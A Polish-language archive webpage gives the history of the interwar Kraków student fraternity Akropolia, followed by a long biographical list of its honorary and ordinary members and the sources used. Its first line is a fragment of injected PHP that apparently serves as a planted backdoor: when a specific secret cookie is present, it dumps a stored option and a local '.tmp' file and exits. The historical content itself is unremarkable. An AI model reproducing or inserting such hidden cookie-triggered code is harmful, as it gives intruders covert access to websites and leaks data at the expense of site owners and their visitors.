if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Akropolia

Dekiel Akropolii - vide Poszukiwania. Nazwa:
Korporacja Studentów Szkół Akademickich w Krakowie “Akropolia”
Siedziba:
Kraków
Data powstania:
25 V 1923 r.
Barwy:
popielata – srebrna – granatowa
Dewiza:
„Wszystko dla Narodu”

Rys historyczny

Akropolia, Kraków ok. 1929 r.

Akropolia powstała w 1923 r. Należała do najstarszych i największych korporacji krakowskich. Została założona - podobnie jak K! Gnomia i K! Corolla - w 1923 r. przez Mariana Schroedera oraz Łucjana Kleina z poznańskiej K! Lechia. W pierwszym okresie działalności znajdowała się pod opieką K! Baltia z Poznania. Podobnie jak w przypadku Baltii Ojcem Korporacji został przywódca obozu narodowego Roman Dmowski.

Od 29 I 1924 r. Akropolia należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 25 I 1924 r.). W 1926 r. powstało Koło Filistrów. W 1929 r. nastąpiła fuzja z K! Patricia. W latach 1929-33 istniała filia Akropolii we Lwowie. Na skutek ustawy jędrzejewiczowskiej musiała ona jednak ulec rozwiązaniu w 1933 r.

Przy Akropolii kandydowały w Związku Polskich Korporacji Akademickich: K! Capitolia oraz K! Palestra.

Pieczęć Akropolii, 1931 r.

Kuratorami Korporacji z ramienia uniwersyteckiego Senatu byli: prof. Stefan Surzycki (1931 r.) oraz prof. Stanisław Gołąb (1938 r.).

Całkowita ustalona, choć niekompletna imienna liczba członków obejmuje 117 nazwisk, w tym 16 członków honorowych. W 1938 r. liczyła 89 członków, w tym 12 członków honorowych.

Brak wiadomości o powojennej działalności Akropolii i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Akropolii obejmuje niemal 120 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Józef Archutowski, (1 listopada 1879 - 31 sierpnia 1944 w Warszawie) ksiądz katolicki, prof. UJ, długoletni dziekan Wydziału Teologicznego UJ, Filister honorowy Akropolii, w latach trzydziestych kurator Młodzieży Wszechpolskiej na UJ, po wybuchu II wojny światowej aresztowany 6 listopada 1939 wraz z wieloma innymi profesorami w ramach akcji Sonderaktion Krakau, wywieziony do obozu w Sachsenhausen, po zwolnieniu z obozu w 1940 m.in. proboszcz parafii Nawiedzenia NMP w Warszawie oraz wykładowca na tajnym Wydziale Teologii Katolickiej UW, zginął podczas Powstania Warszawskiego w zbombardowanym kościele PP. Sakramentek na Rynku Nowego Miasta
 2. Aleksander Brodkiewicz, dyrektor w Tarnobrzegu, Filister honorowy Akropolii
 3. Tadeusz Buszczyński, dyrektor w Krakowie, Filister honorowy Akropolii
 4. Stanisław Gołąb, (25 sierpnia 1878 w Rzeszowie - 29 marca 1939 w Krakowie) s. Michała i Marii z Rittnerów, absolwent gimnazjum klasycznego w Rzeszowie 1896, student i absolwent prawa UJ, doktorat 1900, kontynuował studia na uniwersytetach w Wiedniu, Berlinie, Monachium i Paryżu, pracownik austriackiej Prokuratorii Skarbu, autor prac z zakresu prawa cywilnego, procedury cywilnej oraz teorii i filozofii prawa, od 1918 uczestnik prac kodyfikacyjnych polskiego prawa cywilnego, habilitacja 1918, od 1921 prof. UJ, członek Trybunału Kompetencyjnego, Państwowej Rady Prawniczej oraz Międzynarodowego Instytutu Filozofii i Socjologii Prawa w Paryżu, kurator i Filister honorowy Akropolii, przewodniczący Koła Seniorów Akropolii, pochowany na Cmentarzu Rakowickim w Krakowie, odznaczony Krzyżem Komandorskim Orderu Polonia Restituta i Złotym Krzyżem Zasługi

  Emil Godlewski, ok. 1900 r.

 5. Emil Godlewski, (12 sierpnia 1875 w Hołosku Wielkim pod Lwowem - 25 kwietnia 1944 w Krakowie) s. Emila, absolwent wydziałów medycznego i filozoficznego UJ, lekarz, biolog, embriolog, od 1906 prof. UJ, dziekan Wydziału Lekarskiego UJ 1917/18, 1918/19 i 1931/32, od 1918 członek PAU, nadzwyczajny komisarz rządu polskiego do walki z epidemiami 1920, od 1924 senator RP z ramienia Związku Ludowo-Narodowego, dr honoris causa UJ i UJK, laureat nagrody naukowej m. st. Warszawy 1935, od 1935 członek Papieskiej Akademii Umiejętności, Filister honorowy Akropolii, kurator i Filister honorowy Vesalii

 6. Marian Heitzman, (1899 w Brodach - 18 listopada 1964) s. Henryka, filozof, habilitacja 1929, docent 1930-32 i prof. 1932-39? UJ, członek Korporacji Akropolia oraz Filister honorowy Arcadii, w czasie wojny w PSZ we Francji i Wielkiej Brytanii, attache wojskowy w ZSRR, podejrzany o szpiegostwo na rzecz Wielkiej Brytanii, wydalony do Iranu 1942, autor pierwszego raportu dot. Katynia, po wojnie na emigracji w Ameryce, prof. McGill University w Montrealu oraz College’u św. Tomasza w St. Maul w Minesocie
 7. Tomasz Lulek, (1878-1962) s. Józefa i Maria z d. Bajorek, prof. prawa skarbowego i rachunkowości państwowej UJ, Filister honorowy Akropolii
 8. Adam Łobaczewski, prof. UJ, Filister honorowy Akropolii, w 1938 w Krakowie [być może Adam Wawrzyniec Łobaczewski (1870-1928) s. Ignacego i Marii Trzeciak, farmaceuta, prof. UJ, działacz społeczno-polityczny]
 9. Jan Nowak, (15 października 1880 w Hołyniu w Małopolsce Wschodniej - 18 lutego 1940 w Krakowie), geolog i paleontolog, specjalista w zakresie tektoniki, prowadził badania tektoniczne w Alpach Wschodnich, we wschodniej Syberii oraz w Kraju Nadmorskim, habilitacja UJK 1913, po I wojnie światowej pracował w Państwowym Instytucie Geologicznym i Państwowym Urzędzie Naftowym 1919-21, od 1922 kierownik Zakładu Paleontologicznego w Katedrze Paleontologii UJ, od 1923 kierownik tej Katedry, a od 1928 kierownik Katedry Geologii, Filister honorowy Akropolii, założyciel i prezes 1926-39 Polskiego Towarzystwa Geologicznego, w listopadzie 1939 aresztowany wraz z wieloma innymi profesorami w ramach Sonderaktion Krakau i osadzony w obozie koncentracyjnym w Oranienburgu, zwolniony w stanie skrajnego wyczerpania 6 lutego 1940, zmarł w Krakowie kilka dni później
 10. Karol Hubert Rostworowski, (3 listopada 1877 w Rybnej k. Krakowa - 4 lutego 1938 w Krakowie) z rodziny ziemiańskiej, studiował rolnictwo, kompozycję i filozofię we Lwowie, Halle, Lipsku i Berlinie, dramaturg i poeta, muzyk, członek Polskiej Akademii Literatury, działacz Narodowej Demokracji, radny miasta Krakowa, Filister honorowy Akropoli, pochowany na Cmentarzu Salwatorskim w Krakowie
 11. Stefan Surzycki (senior), (30 sierpnia 1864 w Różancach k. Siedlec - 27 lipca 1936) prof. UJ, s. Tomasza i Marianny z Ciepielowskich, absolwent Gimnazjum Klasycznego w Lublinie 1885, student prawa UW 1885-87, współtwórca Związku Młodzieży Polskiej “Zet”, w 1887 relegowany z uczelni za działalność polityczną, w 1891 osadzony w cytadeli na okres 3 miesięcy, zwolniony za kaucją po ogłoszeniu wyroku więzienia i zsyłki uciekł do Krakowa, ukończył studia z tytułem doktora na Uniwersytecie w Lipsku 1896, po powrocie do Galicji do 1905 pracował w majątkach m.in. Władysława Leona księcia Sapiehy (majątek w Oleszycach) i Andrzeja Kazimierza hrabiego Potockiego (majątki Grójec i Zalas k. Krzeszowic), czynny działacz Stronnictwa Narodowo-Demokratycznego, od 1905 wykładowca w Studium Rolniczym UJ, od 1909 prof. nadzw., od 1919 prof. zw. ekonomii rolniczej, dyrektor Studium Rolniczego 1921-23, dzięki jego staraniom w 1923 Studium przekształcono w samodzielny Wydział Rolniczy, którego został pierwszym dziekanem, kurator i Filister honorowy Akropolii, pochowany na Cmentarzu Rakowickim w Krakowie
 12. Władysław Szafer, (23 lipca 1886 w Sosnowcu - 16 listopada 1970 w Krakowie) absolwent Gimnazjum im. Sz. Konarskiego w Rzeszowie, student botaniki na uniwersytetach w Wiedniu i Lwowie 1905-10, doktorat 1910, studia z zakresu gleboznawstwa i dendrologii na uniwersytetach w Monachium i w Wiedniu 1911-12, od 1912 wykładowca w Wyższej Szkole Lasowej we Lwowie, od 1914 ochotnik-podoficer do polskiego Legionu Wschodniego, po odmowie złożenia przysięgi cesarzowi zdegradowany i wcielony do armii austriackiej, od 1917 wykładowca UJ, prof. zw. 1920, wieloletni dyrektor Instytutu Botaniki, rektor UJ 1936-38, a w czasie wojny tajnego UJ, członek PAU 1920, po wojnie organizator i dyrektor Zakładu Botaniki PAN, dr honoris causa UJ, Uniwersytetu Karola w Pradze oraz UMCS, Filister honorowy Akropolii, autor ok. 700 prac, w większości z zakresu florystyki, paleobotaniki, geografii roślin, ochrony środowiska, twórca polskiej szkoły paleobotanicznej, współtwórca wielu polskich parków narodowych, inicjator odtworzenia populacji żubra w Puszczy Białowieskiej, uczestniczył w tworzeniu Międzynarodowego Biura Ochrony Przyrody w Brukseli (późniejsza Światowa Unię Ochrony Przyrody), pochowany na Cmentarzu Rakowickim w Krakowie
 13. Tadeusz Tabaczyński, inż., w 1938 dyrektor w Bydgoszczy, Filister honorowy Akropolii
 14. Marian Ujejski, ( - lata 90-te w Krakowie), dr prawa, adwokat, Filister honorowy Akropolii
 15. Jan Walkowski, dr med., działacz społeczny, burmistrz Krzeszowic, współtwórca i wieloletni prezes Towarzystwa Miłośników Krzeszowic i Okolic, Filister honorowy Akropolii
 16. Alfred Zacharjasiewicz, (26 sierpnia 1871 we Lwowie - 11 lipca 1937 w Warszawie) s. Juliana, architekt we Lwowie, projektował budowle publiczne i przemysłowe, m.in. gmachy Izby Handlowo-Przemysłowej, Banku Lwowskiego oraz pasażu Mikolascha we Lwowie, mosty, kamienice i wille, Filister honorowy Akropolii

Członkowie rzeczywiści

  Zbigniew Andrzejowski, druga poł. lat 30-tych.

 1. Zbigniew Andrzejowski, (17 marca 1917 w Kijowie - ok. 6 lipca 1941 w Mnichowie k. Jędrzejowa) s. Jana i Marii z Dulskich, absolwent Gimnazjum w Kielcach, student med. UJ, akt. 1938-39, w czasie okupacji w kieleckim ZWZ, ukrywał się przez kilka miesięcy w Książu Małym k. Miechowa, aresztowany 27 czerwca 1941 przez Gestapo w Krakowie, rozstrzelany, pochowany na cmentarzu w Jędrzejowie

 2. Zdzisław Bałabuszyński, student rolnictwa UJ, c. 1930/31, akt. 1930/31
 3. Wacław Marian Bednarski, (24 września 1903 w Prudniku - po 1956) student i absolwent med. UJ 1931, akt. 1930-31, w 1956 kierownik Zakł. Inst. Medycyny Pracy w Szopienicach (obecnie Katowice)
 4. Ernest Berger, c. 1930/31, akt. 1930/31, mgr filologii, w latach 30-tych prof. gimnazjum męskiego w Cieszynie
 5. Karol Białowąs, student i absolwent WSH, akt. 1930-31, skarbnik sem. let. 1930/31

  Jerema Bojarski, ok. 1929 r.

 6. Jarema Bojarski, (1906-1984) student i absolwent WSH, akt. 1930-31

 7. Braun, akt. 1924-25, sekretarz sem. zim. 1924/25
 8. Adam Brodkiewicz, (1902-1996) prawnik, adwokat, w 1938 w Tarnobrzegu
 9. Władysław Bryniarski, dr praw, w 1938 w Katowicach
 10. Jan Brzękowski, ( - lata 50-te) dr fil., w latach 30-tych pracownik (właściciel ?) apteki w Wiśniczu
 11. Jan Choma, student prawa UJ
 12. Tadeusz Choroszyński, student fil. UJ, akt. 1938-39
 13. Jan Cieślicki, inż., w 1938 w Krakowie
 14. Edward Dach, mgr praw, w 1938 w Krakowie
 15. Jan Dulęba, (28 marca 1905 w Zawierciu - 1967) student med. UJ, absolwent med. UW 1931, akt. 1930-31, dr med., w 1956 w Łabędach k. Gliwic
 16. Eustachy Ekielski, (1904-1973) brat Jana (Arcadia), student i absolwent rolnictwa (inż. rolnik) UJ
 17. Władysław Forkiewicz, akt. 1930-31, seminarzysta w seminarium duchowym w Lublinie
 18. Marian Frąfrowicz (Frafrowicz), akt. 1928-29, sekretarz 1929
 19. Władysław Fusek, student i absolwent ASP, akt. 1930-31
 20. Roman Gaweł, student i absolwent PL, c. 1930/31, akt. 1930/31
 21. Tadeusz Głąb, student prawa UJ, c. 1930/31, akt. 1930/31-37, prezes sem. zim. 1936/37
 22. January Grabowski, (?), (1905 we Lwowie - 1986 w Warszawie) akt. 1925-31 w Leopolii, skarbnik Lwowskiego Koła Międzykorporacyjnego 1929, przeniósł się na UJ i do Korporacji Akropolia (?)
 23. Zenon Grabowski, (?), akt. 1924-28 w Leopolii, przeniósł się na UJ i do Korporacji Akropolia, prawnik (?)
 24. Kazimierz Grohman, akt. 1930-31, filolog, prof. gimnazjum we Lwowie
 25. Alfred Gzyl, (1910-1992) student medycyny UJ, c. 1930/31, akt. 1930/31
 26. Fryderyk Hein, student PL, c. 1930/31, akt. 1930/31
 27. Wacław Hołdrowicz, student i absolwent med. UJ, akt. 1930-31, w 1938 w Krakowie
 28. Zbigniew Hroboni, ( - 1939-45) student i absolwent Wydziału Górniczego AG, akt. 1938-39

  Bolesław Huczyński.

 29. Bolesław Huczyński, (12 sierpnia 1904 w Komarnie k. Lwowa - październik 1992 w Krakowie) s. Bolesława i Józefy z d. Zielińska, brat Janusza (Akropolia), absolwent Gimnazjum w Jarosławiu, mgr i dr praw UJ, akt. 1929-32, olderman 1929, olderman sem. zim. 1931/32, od 1936 Honorowy Prezes Akropolii, po studiach pracował jako radca prawny początkowo w magistracie krakowskim, a następnie od 1958 w Związku Polskich Artystów Plastyków

 30. Janusz Julian Huczyński, (4 listopada 1909 w Radymnie w pow. jarosławskim - 2003) s. Bolesława i Józefy z d. Zielińska, brat Bolesława (Akropolia), student i absolwent medycyny UJ, c. 1930/31, akt. 1930/31, dr med. 1946, internista, dyrektor sanatorium w Krynicy, ordynator Oddziału Internistycznego w Krynicy
 31. Leszek Czesław Jarosz, student i absolwent PL, akt. 1930-31, w 1938 w Krakowie
 32. Marian Jaroszewski, absolwent ASP, akt. 1930-31, inż. architekt, w 1938 w Krakowie
 33. Franciszek Jastrzębski, (15 marca 1915 w Klemensowie - 1940) absolwent Państwowego Gimnazjum Męskiego im. Hetmana Jana Zamoyskiego w Zamościu, student i absolwent prawa UJ 1927-31, akt. 1930-31, sekretarz sem. let. 1930/31, aplikant adwokacki w Izbie Adwokackiej w Lublinie z siedzibą w Zamościu, aresztowany w czerwcu 1940 i zamordowany
 34. Władysław Karbowski, student rolnictwa UJ, akt. 1938-39, prezes sem. zim. 1938/39
 35. Adam Kasiewicz, ( - lata 80-te) akt. 1936-37, II wiceprezes sem. zim. 1936/37, w 1938 pracownik Fabryki Lokomotyw w Chrzanowie
 36. Tadeusz Kawczak, inż. rolnik, w 1938 w Sędziejowicach w woj. łuckim
 37. Czesław Klinowski, (10 maja 1908 w Łodzi - po 1956) student i absolwent 1937 med. UJ, akt. 1930-31, olderman sem. let. 1930/31, dr med. UJ 1938, okulista, w 1956 w Krakowie
 38. Zbigniew Klug, student prawa UJ, akt. 1938-39, I wiceprezes sem. zim. 1938/39
 39. Włodzimierz Kłak, student prawa UJ, akt. 1930-32, prezes sem. zim. 1931/32
 40. Tadeusz Kosiński, ( - ok. 1966 w Krakowie) student PL, akt. 1930-31, inż. mechanik
 41. Mieczysław Kossek, (1904-1988), student i absolwent prawa (mgr praw) UJ, akt. 1930-31, w 1938 w Nowym Targu
 42. Jan Koszyk, student i absolwent med. UJ, akt. 1930-31, dr med., w 1938 w Spółce Brackiej w Rydułtowach
 43. Edward Kowalczyk, student i absolwent WSH, akt. 1930-31, w 1938 w Krakowie
 44. Stanisław Kowernicki (Kowenicki), dr praw, adwokat, w 1938 w Krakowie
 45. Tadeusz Kozdęba, akt. 1930-31, mgr filologii, w 1931 prof. gimnazjum w Kolbuszowej
 46. Mieczysław Kożuch, student prawa UJ, akt. 1938-39
 47. Michał Kruczek, student fil. UJ, akt. 1938-39, II wiceprezes sem. zim. 1938/39
 48. Jan Krzemień, mgr prawa, w latach 30-tych mieszkał w Paryżu
 49. Zygmunt Krzesz Męcina, (10 listopada 1899 w Złoczowie - 19 września 1974 w Montrealu) żołnierz w wojsku austriackim w I wojnie światowej, student i absolwent (inż. chemik) PL, akt. 193-31, wiceprezes sem. let. 1930/31 (Lwów), po studiach pracownik Gazowni Miejskiej w Krakowie, we wrześniu 1939 ewakuowany na Wschód, razem z WP przeszedł do Rumunii, w czasie wojny w PSZ we Francji, w niewoli niemieckiej, zwolniony pod pozorem choroby, poprzez strefę nieokupowaną wyjechał do Kanady, po wojnie na emigracji w Kanadzie, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu, pochowany na cmentarzu wojskowym “Field of Honour” w Pointe Claire w Montrealu
 50. Mieczysław Kubiczek, (1904 - 8 listopada 1958), dr medycyny 1928, internista, od 1936 starszy asystent w Klinice Chorób Wewnętrznych, habilitacja 1945, prof. nadzw. 1954 w Krakowskiej Akademii Medycznej, autor ponad 30 prac naukowych, głównie z zakresu hematologii, przewodniczący Krakowskiego Koła Internistów Polskich, Krakowskiego Koła Polskiego Towarzystwa Balneologicznego, sekretarz Polskiego Towarzystwa Hematologicznego

  Julian Kulka, lata 30-te.

 51. Julian Kulka, (4 listopada 1913 w miejsc. Grębynice w pow. Olkusz - 9 maja 1997 w Łodzi), s. Jana (rolnika) i Antoniny z d. Siwek, absolwent Gimnazjum im. B. Nowodworskiego w Krakowie 1935, student Wydziału Filozoficznego UJ 1936-1940 i 1945, student i absolwent Wydziału Chemii UW 1945 (inż. chemik, mgr nauk technicznych), c. 1938, akt. 1938-39, od 1939 w ruchu oporu, członek SZP-ZWZ-AK, Okręg Kraków, po wojnie pracował jako chemik-analityk, głównie w Zjednoczeniu Przemysłu Celulozowo-Papierniczego w Łodzi, wykładowca PW, autor patentów, oznaczony m.in. Srebrnym Krzyżem Zasługi, Złotą Odznaką Racjonalizatora Produkcji, Krzyżem Kawalerskim OOP, pochowany na Cmentarzu Rakowickim w Krakowie [Źródła (poza wskazanymi poniżej spisu członków): relacja Ewy Goras]

 52. Józef Kuśmierz, ( - 1939-1945) student PL, c. 1930/31, akt. 1930/31, zginął śmiercią lotnika w czasie nalotu na zakłady Mercedes Benz
 53. Lucjan Kwieciński, dr fil., w 1938 w Zgierzu k. Łodzi
 54. Adam Lachowicz, akt. 1924-25, prezes sem. zim. 1924/25, inż. rolnictwa, w 1938 w Katowicach
 55. Marian Lachowicz, student rolnictwa UJ, akt. 1938-39
 56. Wiktor Lex, student prawa UJ, c. 1938, akt. 1938-39
 57. Leonard Liszewski, student rolnictwa UJ, akt. 1938-39
 58. Jan Łobodycz, (?), mgr praw
 59. Franciszek Mańkowski, (28 sierpnia 1914 w Służewie w pow. nieszawskim - 1992) student med. UJ, akt. 1938-39, student i absolwent med. UŁ 1951, w 1956 w Łasku
 60. Józef Matolicz, student prawa UJ, akt. 1938-39
 61. Henryk Maziarski, (1908 - ) student i absolwent prawa UJ, akt. 1929-31, wiceprezes 1929, prezes, wiceprezes, olderman, prezes sem. let. 1930/31, w 1938 w Krakowie, po wojnie na emigracji w Wielkiej Brytanii
 62. Zbigniew Michorecki (Michorowski), w 1938 w Krakowie
 63. Jan Miciński (Miczyński), ( - ok. 1949 w Nowym Sączu) inż. Rolnik, w 1938 w Puławach
 64. Zdzisław Nąckiewicz, student i absolwent med. UJ, akt. 1930-31, wiceprezes sem. zim. 1931/32, lekarz, w 1938 w Łodzi
 65. Mieczysław Niesiołowski, student PL, c. 1930/31, akt. 1930/31
 66. Zbigniew Nowak, student prawa UJ, c. 1930/31, akt. 1930/31-32, sekretarz sem. zim. 1931/32, w 1938 w Krakowie
 67. Zbigniew Oleś, ( - luty 1983 w Krakowie) akt. 1928-32, prezes 1928, II wiceprezes Krakowskiego Koła Międzykorporacyjnego 1931/32 (od grudnia 1931), inż., w 1938 w Krakowie
 68. Włodzimierz Perłowski, student i absolwent med. UJ, akt. 1927-29 (?) w Praetorii, olderman 1928, prawd. wystąpił z Preatorii i wstąpił do Arkopolii, akt. 1930-31 w Arkopolii
 69. Kazimierz Piątkowski, z Częstochowy, student prawa UJ, akt. 1938-39
 70. Roman Pietruszewski, student fil. UJ, c. 1938, akt. 1938-39
 71. Ludwik (Korwin-)Piotrowski, (1904-1988) założyciel Praetorii, akt. 1925-29 (?), pierwszy sekretarz 1925, prezes 1928, prawd. wystąpił z Preatorii i wstąpił do Arkopolii, filister Arkopolii 1930/31, dr medycyny
 72. Tadeusz Pisz, student rolnictwa UJ, akt. 1930-31, wiceprezes sem. let. 1930/31, inż., w 1938 w Nowym Sączu
 73. Tadeusz Proba, student i absolwent filozofii UJ, w 1938 w Tarnowskich Górach
 74. Leon Prochowski, student prawa UJ, c. 1938, akt. 1938-39
 75. Zbigniew Regiec, student PL, akt. 1927-31, wiceolderman sem. let. 1930/31 (Lwów), sekretarz Krakowskiego Koła Międzykorporacyjnego sem. zim. 1927/28
 76. Tadeusz Romański, student prawa UJ, akt. 1938-39
 77. Adam Różdżeński, student PL, c. 1930/31, akt. 1930/31
 78. Eugeniusz Schlönvogt, ( - 1937) student i absolwent med. UJ, akt. 1930-31, dr med.
 79. Wacław Siekierzycki, student rolnictwa UJ, akt. 1938-39, olderman sem. zim. 1938/39
 80. Edmund Sitnicki, student prawa UJ, student i absolwent WSH, c. 1930/31, akt. 1930-31, w 1938 w Maczkach
 81. Leonard Słota, student fil. UJ, akt. 1938/39, sekretarz sem. zim. 1938/39
 82. Stanisław Stoch, (21 grudnia 1903 w Krakowie - ) student i absolwent UJ 1928, akt. 1924-31, wiceprezes sem. zim. 1924/25, dr med. (?), chirurg, w 1938 w Sosnowcu
 83. Stefan Surzycki (junior), (1908-1956) akt. 1930-31, p.o. prezesa Krakowskiego Koła Międzykorporacyjnego (luty) 1931, prezes Krakowskiego Komitetu Związku Narodowego Polskiej Młodzieży Akademickiej 1931, dr praw, więzień obozu koncentracyjnego w Auschwitz

  Mieczyslaw Szecówka, lata 30-te.

 84. Mieczyslaw Szecówka, (1909 - 12 grudnia 1984 w Krakowie), student i absolwent Wydziału Górniczego AG (?), student fil. UJ, akt. 1938-39, pchor. w wojnie obronnej 1939, starszy wykładowca AGH

 85. Jan Szumowski, student i absolwent prawa UJ, akt. 1927-31, prezes 1929, prezes Krakowskiego Koła Międzykorporacyjnego sem. zim. 1927/28, w 1938 w Krakowie
 86. Stanisław Ścierański, student prawa UJ, c. 1930/31, akt. 1930/31
 87. Jan Tabaczyński, prezes 1924, mgr praw, w latach 30-tych pracownik redakcji “Polonii” w Katowicach
 88. Stanisław Turowicz, student PL, c. 1930/31, akt. 1930/31
 89. Jan Walkowski, [prawd. s. Jana (Akropolia)], akt. 1927-31, wiceprezes Krakowskiego Koła Międzykorporacyjnego sem. zim. 1927/28, dr med., w 1938 w Szpitalu św. Łazarza w Krakowie
 90. Leszek Wątocki, (15 marca 1909 w Krakowie - 19 września 1972 w Krakowie) s. Andrzeja, absolwent VIII Gimnazjum w Krakowie, student i absolwent Wydział Hutniczego AG 1935-46, I wiceprezes sem. zim. 1936/37, w konspiracji w AK w Myślenicach, kierownik budowy i kierownik ruchu w Elektrowni Dobczyce 1940-46, po wojnie m.in. kierownik produkcji Wytwórni Wyrobów Metalowych “Orion” w Krakowie 1946-48, kierownik biura konstrukcyjnego Głównego Instytutu Odlewniczego 1948-50, dyrektor Krakowskich Zakładów Naprawy Samochodów w Krakowie 1950-52, dyrektor techniczny Krakowskiego Przedsiębiorstwa Transportowego 1953-55, kierownik techniczny Przedsiębiorstwa Sprzętu Transportowego w Krakowie 1959-61 oraz kierownik biura zespołu i rzeczoznawca Zespołu Rzeczoznawców P.Z.Mot. w Krakowie 1961-72, od 1972 na emeryturze
 91. Stefan Wiland, mgr praw, w 1938 w Górce Narodowej

  Czesław Winiarski, lata 20-te.

 92. Czesław Winiarski, ( - ok. 1980) akt. 1930-31, inż. rolnik, w 1938 w Szczawnicy Zdroju

 93. Jerzy Wojciechowski, student i absolwent prawa UJ, akt. 1930-31, w 1938 w Dąbrowie Górniczej
 94. Janusz Wróblewski, student med. UJ, akt. 1930-31, dr med., w 1938 w Krakowie
 95. Stanisław Wysocki, student i absolwent prawa UJ, c. 1930/31, akt. 1930/31, w 1938 w Krakowie
 96. Władysław Zagórski, student rolnictwa UJ, c. 1930/31, akt. 1930/31
 97. Zbigniew (Jan Zbigniew) Zając, student prawa UJ, akt. 1929-31, prezes sem. zim. 1929/30
 98. Jan Zarząski, student i absolwent prawa UJ, w 1938 w Krakowie
 99. Jan Zawadzki, student rolnictwa UJ, c. 1930/31, akt. 1930/31
 100. Stanisław Żak, student prawa UJ, c. 1938, akt. 1938-39
 101. Władysław Żbik, mgr praw, w 1938 pracownik Konsulatu RP w Lille

Listę członków opracowano na podstawie:

1) “Akropolia” Korporacja Studentów Szkół Akademickich w Krakowie, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1930-1931, Kraków 1931, 4 i n.,
2) Akropolia Korporacja Studentów Szkół Akademickich w Krakowie, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1938-1939, Kraków 1938, s. 4 i n.,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Akropolia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 16 X 2011 r.
Ostatnia zmiana: 30 III 2016 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Akropolia (Kraków), (na:) www.archiwumkorporacyjne.pl, stan 30 III 2016 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }